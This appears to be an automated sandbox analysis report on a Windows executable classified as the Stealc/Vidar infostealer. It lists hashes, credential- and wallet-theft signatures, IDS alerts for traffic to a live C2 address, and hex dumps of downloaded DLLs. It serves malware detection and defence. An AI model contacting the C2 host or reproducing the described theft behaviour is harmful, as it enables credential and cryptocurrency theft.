Windows Analysis Report
4c469e2cf403fea6249e835ddce23de2.exe

Overview

General Information

Sample name: 4c469e2cf403fea6249e835ddce23de2.exe
Analysis ID: 1523165
MD5: 3988d57be5af6fb461fec4bbd0f747f3
SHA1: c4ea1473edc170309eb4f0d3b8f753e390ac1553
SHA256: 869deec09d4b035c500fb282df367e622f3e75e39fef3f6cd674fb1d1dca7b09
Tags: exe, Stealc, user-abuse_ch

Detection

Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA software and the Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: http://45.200.148.113/0a616124ff2f2b69.phpO Virustotal: Detection: 13%
Source: 4c469e2cf403fea6249e835ddce23de2.exe ReversingLabs: Detection: 13%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7FA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 0_2_6C7FA9A0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7F4440 PK11_PrivDecrypt, 0_2_6C7F4440
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7C4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 0_2_6C7C4420
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7F44C0 PK11_PubEncrypt, 0_2_6C7F44C0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C8425B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt, 0_2_6C8425B0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7D8670 PK11_ExportEncryptedPrivKeyInfo, 0_2_6C7D8670
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7FA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext, 0_2_6C7FA650
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7DE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free, 0_2_6C7DE6E0
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: mozglue.pdbP source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1962494191.000000006F8DD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: z:\build-dev\usbnet5.Mon_05_17_2021_16_10_12.10\projects\usbnet5\src\virt\shell\Release\usbclient.pdb0@_\9] source: 4c469e2cf403fea6249e835ddce23de2.exe
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1962304971.000000006C8CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: z:\build-dev\usbnet5.Mon_05_17_2021_16_10_12.10\projects\usbnet5\src\virt\shell\Release\usbclient.pdb source: 4c469e2cf403fea6249e835ddce23de2.exe
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: z:\build-dev\usbnet5.Mon_05_17_2021_16_10_12.10\projects\usbnet5\src\virt\shell\Release\usbclient.pdb0@ source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1937425066.0000000000B4E000.00000002.00000001.01000000.00000003.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000000.1696785302.0000000000B4E000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1962304971.000000006C8CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1962494191.000000006F8DD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Networking

Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49732 -> 45.200.148.113:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49732 -> 45.200.148.113:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 45.200.148.113:80 -> 192.168.2.4:49732
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49732 -> 45.200.148.113:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 45.200.148.113:80 -> 192.168.2.4:49732
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49732 -> 45.200.148.113:80
Source: Network traffic Suricata IDS: 2044249 - Severity 1 - ET MALWARE Win32/Stealc Submitting Screenshot to C2 : 192.168.2.4:49732 -> 45.200.148.113:80
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 01 Oct 2024 05:51:10 GMTContent-Type: application/x-msdos-programContent-Length: 1106998Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 
00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 01 Oct 2024 05:51:14 GMTContent-Type: application/x-msdos-programContent-Length: 685392Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 
00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 01 Oct 2024 05:51:15 GMTContent-Type: application/x-msdos-programContent-Length: 608080Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 
00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 01 Oct 2024 05:51:15 GMTContent-Type: application/x-msdos-programContent-Length: 450024Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 
00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 01 Oct 2024 05:51:16 GMTContent-Type: application/x-msdos-programContent-Length: 2046288Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 